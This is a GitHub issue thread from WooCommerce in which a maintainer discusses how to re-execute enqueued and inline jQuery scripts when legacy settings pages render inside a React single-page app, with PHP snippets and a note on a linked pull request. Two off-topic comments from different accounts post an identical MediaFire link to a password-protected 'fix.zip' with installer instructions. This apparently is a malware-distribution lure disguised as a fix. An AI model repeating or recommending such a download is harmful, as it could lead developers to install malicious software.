### ISSUE TITLE
Settings Spike: Executing external JS

### ISSUE THREAD

**Issue by psealock** [woothemes/woocommerce#50946]
**Prerequisites (mark completed items with an [x]):**
- [x] I have checked that my issue type is not listed here https://github.com/woocommerce/woocommerce/issues/new/choose
- [x] My issue is not a security issue, support request, bug report, enhancement or feature request (Please use the link above if it is).

**Issue Description:**

Many extensions and our own settings pages make use of external javascript. Primarily, jQuery scripts are registered and enqueued when on admin pages. Reactified Settings will render legacy views in a single page app, so external javascript needs to get executed on every tab and section navigation as if the page was loading for the first time. Further, these scripts usually depend on a DOM ready event, but this is much too early as React hasn't rendered yet.

Another thing to consider is native Javascript could be added to a page like so: 

```php
public function output() {

		global $current_section;

		$settings = $this->get_settings( $current_section );
		WC_Admin_Settings::output_fields( $settings );

		?>
		<script>
		jQuery(document).ready(function($) {
			$('#picklist-field-select').on('change', function() {
				// Get the selected value from the dropdown
				var selectedField = $(this).val();

				// Update the barcode text input field with the selected value
				$('#picklist_options\\[cas_pick_product_c1\\]').val(selectedField);
			});
		});
		</script>
		<?php
}
```
In https://github.com/woocommerce/woocommerce/pull/48340/files#diff-96b06b1e4172658912e8cb3c046e4612dc660554c065d7c8ca3c111f509869ce I used a script to delay jQuery execution by creating a queue. I re-executed the queue on a browser event fired by React. This works, but only for jQuery scripts.

Another idea is to gather scripts maybe using `$wp_scripts->queue` and add them to the DOM on every tab/page navigation.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by psealock** [comment]
In https://github.com/woocommerce/woocommerce/pull/48340 I was able to get Javascript working well.

Using `$wp_scripts` to gather all enqueued Javascript, plain or otherwise, I pass those script sources to the client.
```php
global $wp_scripts;
$settings['scripts'] = array();

foreach ( $wp_scripts->queue as $script ) {
	$registered_script = $wp_scripts->registered[ $script ];
	if ( isset( $registered_script ) ) {
		$settings['settingsScripts'][ $script ] = array(
			'src' => $registered_script->src,
		);
	}
}
```

On the client, I append a new script tag with the source so that the JS is run on every tab and page change.
